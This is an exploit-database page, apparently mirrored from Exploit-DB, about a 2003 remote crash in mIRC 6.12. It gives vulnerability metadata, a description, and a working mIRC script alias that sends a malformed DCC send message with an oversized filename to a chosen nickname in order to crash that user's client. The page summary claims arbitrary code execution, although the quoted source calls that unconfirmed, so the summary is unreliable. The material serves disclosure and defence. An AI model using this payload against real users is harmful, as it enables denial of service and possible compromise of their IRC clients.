header-logo
Suggest Exploit
vendor:
mIRC
by:
SecurityFocus
7,5
CVSS
HIGH
mIRC Client Remote Crash
N/A
CWE
Product Name: mIRC
Affected Version From: 6.12
Affected Version To: 6.12
Patch Exists: YES
Related CWE: N/A
CPE: o:mirc:mirc
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2003

mIRC Client Remote Crash

A vulnerability has been reported to exist in mIRC that may allow a remote attacker to crash a vulnerable mIRC client. It has been reported that the issue will present itself only in certain circumstances. An attacker can leverage this issue to have arbitrary code executed in the context of the affected mIRC client by using the alias mirc612 command.

Mitigation:

Upgrade to the latest version of mIRC.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9492/info

A vulnerability has been reported to exist in mIRC that may allow a remote attacker to crash a vulnerable mIRC client.

It has been reported that the issue will present itself only in certain circumstances. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a remote attacker may potentially lever this issue to have arbitrary code executed in the context of the affected mIRC client. 

alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }

Navigation

Suggest Exploit

Services By CQR